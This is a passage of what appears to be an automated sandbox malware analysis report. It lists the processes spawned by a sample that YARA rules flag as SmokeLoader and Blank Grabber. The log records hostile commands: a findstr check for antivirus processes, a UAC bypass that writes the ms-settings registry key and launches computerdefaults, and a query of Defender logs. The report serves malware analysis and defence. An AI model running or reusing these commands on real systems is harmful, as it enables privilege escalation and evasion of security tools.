                                                                                                                                                                                                                                Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                                                                                                                                                                                Imagebase:0xb70000
                                                                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:16:40:08
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:cmd /c md 1181
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                Start time:16:40:08
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:findstr /V "perulesserpalacecorrespondence" Video
                                                                                                                                                                                                                                Imagebase:0xb70000
                                                                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                Start time:16:40:08
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:cmd /c copy /b Outlook + Imports 1181\U
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                Start time:16:40:08
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:1181\End.pif 1181\U
                                                                                                                                                                                                                                Imagebase:0x990000
                                                                                                                                                                                                                                File size:947'288 bytes
                                                                                                                                                                                                                                MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                Start time:16:40:08
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:ping -n 5 127.0.0.1
                                                                                                                                                                                                                                Imagebase:0x460000
                                                                                                                                                                                                                                File size:18'944 bytes
                                                                                                                                                                                                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                Start time:16:40:25
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                                                                                                                                                                                                                                Imagebase:0x990000
                                                                                                                                                                                                                                File size:947'288 bytes
                                                                                                                                                                                                                                MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                Start time:16:40:26
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                                                                                                                                                                                                                                Imagebase:0x7ff70f330000
                                                                                                                                                                                                                                File size:947'288 bytes
                                                                                                                                                                                                                                MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                Start time:16:40:26
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                                                                                                                                                                                                                                Imagebase:0x990000
                                                                                                                                                                                                                                File size:947'288 bytes
                                                                                                                                                                                                                                MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.2017597409.0000000000901000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000002.2017597409.0000000000901000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                Start time:16:40:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:16:40:38
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                Imagebase:0x7ff72b770000
                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:16:40:58
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\wsruwii
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\wsruwii
                                                                                                                                                                                                                                Imagebase:0x140000
                                                                                                                                                                                                                                File size:947'288 bytes
                                                                                                                                                                                                                                MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                Start time:16:41:18
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                Imagebase:0x7ff6c99c0000
                                                                                                                                                                                                                                File size:8'850'847 bytes
                                                                                                                                                                                                                                MD5 hash:CB769D049C4541F926F5D6B8D1FF5929
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000015.00000003.2406506000.0000025F9EEDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000015.00000003.2406506000.0000025F9EEDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                Start time:16:41:19
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                Imagebase:0x7ff71e800000
                                                                                                                                                                                                                                File size:8'850'847 bytes
                                                                                                                                                                                                                                MD5 hash:CB769D049C4541F926F5D6B8D1FF5929
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                Start time:16:41:21
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                Start time:16:41:21
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                Start time:16:41:21
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f
                                                                                                                                                                                                                                Imagebase:0x7ff60ebe0000
                                                                                                                                                                                                                                File size:77'312 bytes
                                                                                                                                                                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                Start time:16:41:21
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                Start time:16:41:21
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                Start time:16:41:21
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f
                                                                                                                                                                                                                                Imagebase:0x7ff60ebe0000
                                                                                                                                                                                                                                File size:77'312 bytes
                                                                                                                                                                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                Start time:16:41:21
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                Start time:16:41:22
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                Start time:16:41:22
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\wevtutil.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                                                                                                                                                                                                                                Imagebase:0x7ff757290000
                                                                                                                                                                                                                                File size:278'016 bytes
                                                                                                                                                                                                                                MD5 hash:1AAE26BD68B911D0420626A27070EB8D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                Start time:16:41:22
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "computerdefaults --nouacbypass"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                Start time:16:41:22
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                Start time:16:41:22
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:computerdefaults --nouacbypass
                                                                                                                                                                                                                                Imagebase:0x7ff6a0c10000
                                                                                                                                                                                                                                File size:81'920 bytes
                                                                                                                                                                                                                                MD5 hash:D25A9E160E3B74EF2242023726F15416
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                Start time:16:41:22
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\ComputerDefaults.exe" --nouacbypass
                                                                                                                                                                                                                                Imagebase:0x7ff6a0c10000
                                                                                                                                                                                                                                File size:81'920 bytes
                                                                                                                                                                                                                                MD5 hash:D25A9E160E3B74EF2242023726F15416
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                                                Start time:16:41:23
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\ComputerDefaults.exe" --nouacbypass
                                                                                                                                                                                                                                Imagebase:0x7ff6a0c10000
                                                                                                                                                                                                                                File size:81'920 bytes
                                                                                                                                                                                                                                MD5 hash:D25A9E160E3B74EF2242023726F15416
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                Start time:16:41:24
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\DE5A.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6c99c0000
                                                                                                                                                                                                                                File size:8'850'847 bytes
                                                                                                                                                                                                                                MD5 hash:CB769D049C4541F926F5D6B8D1FF5929
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000027.00000003.2469980302.000001FEA781A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000027.00000003.2469980302.000001FEA7818000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                Start time:16:41:24
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                Start time:16:41:24
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                Start time:16:41:24
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\wevtutil.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                                                                                                                                                                                                                                Imagebase:0x7ff757290000
                                                                                                                                                                                                                                File size:278'016 bytes
                                                                                                                                                                                                                                MD5 hash:1AAE26BD68B911D0420626A27070EB8D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                                Start time:16:41:24
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "reg delete hkcu\Software\Classes\ms-settings /f"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:44
                                                                                                                                                                                                                                Start time:16:41:24
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:45
                                                                                                                                                                                                                                Start time:16:41:24
